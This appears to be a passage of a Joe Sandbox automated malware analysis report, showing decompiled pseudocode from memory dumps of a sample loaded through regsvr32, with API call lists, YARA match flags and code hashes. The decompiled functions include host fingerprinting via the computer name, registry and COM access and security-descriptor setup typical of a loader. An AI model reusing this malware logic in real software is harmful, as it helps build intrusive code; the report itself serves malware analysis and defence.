                                                                                                                                                                                                                                    						if(( *0x23ed260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							E023E8F83(_t80, _v88, _v84,  *0x23ed270, 0);
                                                                                                                                                                                                                                    							_t80 = E023E1C74(_v88,  &_v80,  &_v76, 0);
                                                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                                                    								_v24 = _a4;
                                                                                                                                                                                                                                    								_v20 =  &_v88;
                                                                                                                                                                                                                                    								_t80 = E023E42EA( &_v40, 0);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							E023E9039(_v88);
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t67 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    						_t18 = _t67 + 0x23ee823; // 0x65696c43
                                                                                                                                                                                                                                    						_t70 = E023E809F(0, _t18);
                                                                                                                                                                                                                                    						_t89 = _t70;
                                                                                                                                                                                                                                    						if(_t70 == 0) {
                                                                                                                                                                                                                                    							_t80 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t80 = E023E6BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                                                                                                                                                                                                                                    							E023E9039(_t89);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t80 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}



























                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E3DEE
                                                                                                                                                                                                                                      • Part of subcall function 023E6A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,023E3E14,00410025,00000005,?,00000000), ref: 023E6A23
                                                                                                                                                                                                                                      • Part of subcall function 023E6A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 023E6A40
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 023E3E22
                                                                                                                                                                                                                                    • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 023E3E2D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3817122888-0
                                                                                                                                                                                                                                    • Opcode ID: 03ab03ba969a4daba3af2099c756e51df2e3767f52c84cec42e3cf9b6aba3425
                                                                                                                                                                                                                                    • Instruction ID: a46996d6b75b3f3ad32bc1fe1ed18e96c1752c38590d5218d5d1809f912a7991
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03ab03ba969a4daba3af2099c756e51df2e3767f52c84cec42e3cf9b6aba3425
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5414DB290122CAACF21EEE4CC849EE7BBDAF08744F004565E506EB190D771DE4D8B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E023E9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                                                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                    				if(_t76 < 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t76;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t40 = E023E3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                    				_t76 = _t40;
                                                                                                                                                                                                                                    				if(_t76 >= 0) {
                                                                                                                                                                                                                                    					_t61 = _a28;
                                                                                                                                                                                                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t76 >= 0) {
                                                                                                                                                                                                                                    						_t43 =  *_t55;
                                                                                                                                                                                                                                    						_t68 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    						_t20 = _t68 + 0x23ee1fc; // 0x740053
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                                                                                    							_t76 = E023E7C14(_a4);
                                                                                                                                                                                                                                    							if(_t76 >= 0) {
                                                                                                                                                                                                                                    								_t65 = _a28;
                                                                                                                                                                                                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                    									_t50 = _a4;
                                                                                                                                                                                                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t45 = _a4;
                                                                                                                                                                                                                                    						if(_t45 != 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t57 = __imp__#6;
                                                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a20);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a12);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t41 = _v8;
                                                                                                                                                                                                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E3AEF: SysAllocString.OLEAUT32(80000002), ref: 023E3B46
                                                                                                                                                                                                                                      • Part of subcall function 023E3AEF: SysFreeString.OLEAUT32(00000000), ref: 023E3BAB
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 023E9231
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(023E1885), ref: 023E923B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                                                                                    • Opcode ID: 0ee8332359439ecd7df298dce70a3bb6acdc7ec0e9ad117d1426520cea129bf9
                                                                                                                                                                                                                                    • Instruction ID: 4040e0502194a3e8684ea1317fd5889d6f00b07029180c05bd567b6d24f9bdf6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ee8332359439ecd7df298dce70a3bb6acdc7ec0e9ad117d1426520cea129bf9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31315B71900129EFCF21DFA5C888D9BBB7AEFC97447104658F8169B250E331ED95CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E026D135A() {
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void _v32;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                    				int _t26;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t15 =  *0x26d4150;
                                                                                                                                                                                                                                    				if( *0x26d412c > 5) {
                                                                                                                                                                                                                                    					_t16 = _t15 + 0x26d50f9;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t16 = _t15 + 0x26d50b1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				E026D1FE7(_t16, _t16);
                                                                                                                                                                                                                                    				_t36 = 6;
                                                                                                                                                                                                                                    				memset( &_v32, 0, _t36 << 2);
                                                                                                                                                                                                                                    				if(E026D1414( &_v32,  &_v16,  *0x26d414c ^ 0xfd7cd1cf) == 0) {
                                                                                                                                                                                                                                    					_t25 = 0xb;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t26 = lstrlenW( *0x26d4138);
                                                                                                                                                                                                                                    					_t8 = _t26 + 2; // 0x2
                                                                                                                                                                                                                                    					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                                                                                                                                    					_t30 = E026D102F(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                    						_t32 = _v36;
                                                                                                                                                                                                                                    						 *_t32 = 0;
                                                                                                                                                                                                                                    						if( *0x26d4138 == 0) {
                                                                                                                                                                                                                                    							 *((short*)(_t32 + 4)) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							E026D200D(_t44, _t32 + 4);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t25 = E026D1E11(_v28); // executed
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				ExitThread(_t25);
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExitThreadlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2636182767-0
                                                                                                                                                                                                                                    • Opcode ID: e806d10e5c99e1d57a01a36d772ed49a835e88ff7236d7478c73215048721251
                                                                                                                                                                                                                                    • Instruction ID: 6a2f4e0bdfc932881abacdc86267053da73c3a3c00b8fb69ab55b716feb3cb6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e806d10e5c99e1d57a01a36d772ed49a835e88ff7236d7478c73215048721251
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4311BE71D0824D9FDB20DBA4C848EAB77E8AB0A300F4208AAB159E7250EB70E5948B51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E023E54BC(void* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = __imp__;
                                                                                                                                                                                                                                    				_t20 = 0;
                                                                                                                                                                                                                                    				_v8 = _v8 & 0;
                                                                                                                                                                                                                                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                    				_t10 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					_t20 = E023E2049(_t10 + 1);
                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                    						if(_t15 != 0) {
                                                                                                                                                                                                                                    							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							E023E9039(_t20);
                                                                                                                                                                                                                                    							_t20 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,023EA306,76D7F710,00000000,?,?,023EA306), ref: 023E54D4
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,023EA306,023EA307,?,?,023EA306), ref: 023E54F1
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
• Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
• Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 187446995-0
                                                                                                                                                                                                                                    • Opcode ID: dd44a1eea04b9b8455c6eb74122d944c39bed0af7af1a060a933a1cae6e4fb40
                                                                                                                                                                                                                                    • Instruction ID: 8f4a4c0a4a13b8285fca877dec8d2ec8016bcd4891f159c501ae996db8277bf3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd44a1eea04b9b8455c6eb74122d944c39bed0af7af1a060a933a1cae6e4fb40
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDF05467600129FBEF21D69A9C00FAF77AEDBC5654F510065E906D71C0EAB0DE098770
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t14 = 1;
                                                                                                                                                                                                                                    				_t4 = _a8;
                                                                                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                                                                                    					if(InterlockedDecrement(0x23ed23c) == 0) {
                                                                                                                                                                                                                                    						E023E970F();
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_t4 == 1 && InterlockedIncrement(0x23ed23c) == 1) {
                                                                                                                                                                                                                                    						_t10 = E023E6A56(_t11, _t12, _a4); // executed
                                                                                                                                                                                                                                    						if(_t10 != 0) {
                                                                                                                                                                                                                                    							_t14 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(023ED23C), ref: 023E806A
                                                                                                                                                                                                                                      • Part of subcall function 023E6A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,023E807D,?), ref: 023E6A69
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(023ED23C), ref: 023E808A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
• Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
• Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3834848776-0
                                                                                                                                                                                                                                    • Opcode ID: 4f52faae9b4aa65394f224cee79c559da784bf033f6074d50f9f7cf4a8e7cc75
                                                                                                                                                                                                                                    • Instruction ID: 141a823f2fb99b590081d5473c437d5d5b43fb01602cfe62d9db0e64c1dfc6dc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f52faae9b4aa65394f224cee79c559da784bf033f6074d50f9f7cf4a8e7cc75
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAE026B4E50232B39E306BB48804B5EA719AF84B80F018E20F687C41F0C710CC9ECAD1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E023E9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				short _t17;
                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                    				short _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				_t15 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    				_t4 = _t15 + 0x23ee39c; // 0x4cc8944
                                                                                                                                                                                                                                    				_t20 = _t4;
                                                                                                                                                                                                                                    				_t6 = _t15 + 0x23ee124; // 0x650047
                                                                                                                                                                                                                                    				_t17 = E023E9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                    				if(_t17 < 0) {
                                                                                                                                                                                                                                    					_t23 = _t17;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_v20 != 8) {
                                                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t19 = E023E9FC9(_t20, _v12);
                                                                                                                                                                                                                                    						if(_t19 == 0) {
                                                                                                                                                                                                                                    							_t23 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a16 = _t19;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__imp__#6(_v12);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E9152: SysFreeString.OLEAUT32(?), ref: 023E9231
                                                                                                                                                                                                                                      • Part of subcall function 023E9FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,023E7946,004F0053,00000000,?), ref: 023E9FD2
                                                                                                                                                                                                                                      • Part of subcall function 023E9FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,023E7946,004F0053,00000000,?), ref: 023E9FFC
                                                                                                                                                                                                                                      • Part of subcall function 023E9FC9: memset.NTDLL ref: 023EA010
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E937E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 397948122-0
                                                                                                                                                                                                                                    • Opcode ID: fa1d33aa9715b4522e632afaefa1d16057566079296ce3ddd57aa72bae0c3045
                                                                                                                                                                                                                                    • Instruction ID: 7b10dde529fb8a660570d2fd7d6f91b7a0ee291f2392f01263e8fa1fa1791e39
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1d33aa9715b4522e632afaefa1d16057566079296ce3ddd57aa72bae0c3045
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1019E32500229BFCF209FA8CC04AEEBBB9EB48710F014865E912E71E0D370D959CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E026D1FE7(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				 *0x26d4148 =  *0x26d4148 & 0x00000000;
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push(0x26d4144);
                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                                    				 *0x26d4140 = 0xc; // executed
                                                                                                                                                                                                                                    				L026D1BD6(); // executed
                                                                                                                                                                                                                                    				return __eax;
                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(026D1387,00000001,026D4144,00000000), ref: 026D2005
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3907675253-0
                                                                                                                                                                                                                                    • Opcode ID: 0af3f420d919bb9f090c1db091ebb44b4576691c6e10c3ad0566c21fe8448ffa
                                                                                                                                                                                                                                    • Instruction ID: 68e3302f64651f0577019575355b5eb630399dc8356ffc70b2086dea224a03ba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0af3f420d919bb9f090c1db091ebb44b4576691c6e10c3ad0566c21fe8448ffa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EC04CB4D81309ABF7209B01DC45F297652776874DF105908F149761C08BF514A48919
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E2049(long _a4) {
                                                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t2 = RtlAllocateHeap( *0x23ed238, 0, _a4); // executed
                                                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                    • Opcode ID: 17d1d3afc806088ef16c4ea1d575780ea14f18ff22206dd57b30038742b2bcd4
                                                                                                                                                                                                                                    • Instruction ID: d6a83bda2f530f2250dd22b6bef867b19ef738f4638711b9bb7b91bfb0444853
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17d1d3afc806088ef16c4ea1d575780ea14f18ff22206dd57b30038742b2bcd4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AB012B6C80200EBCE218B40DD04F0DBB29AB54700F004D11F2044C0F0C3319878EB05
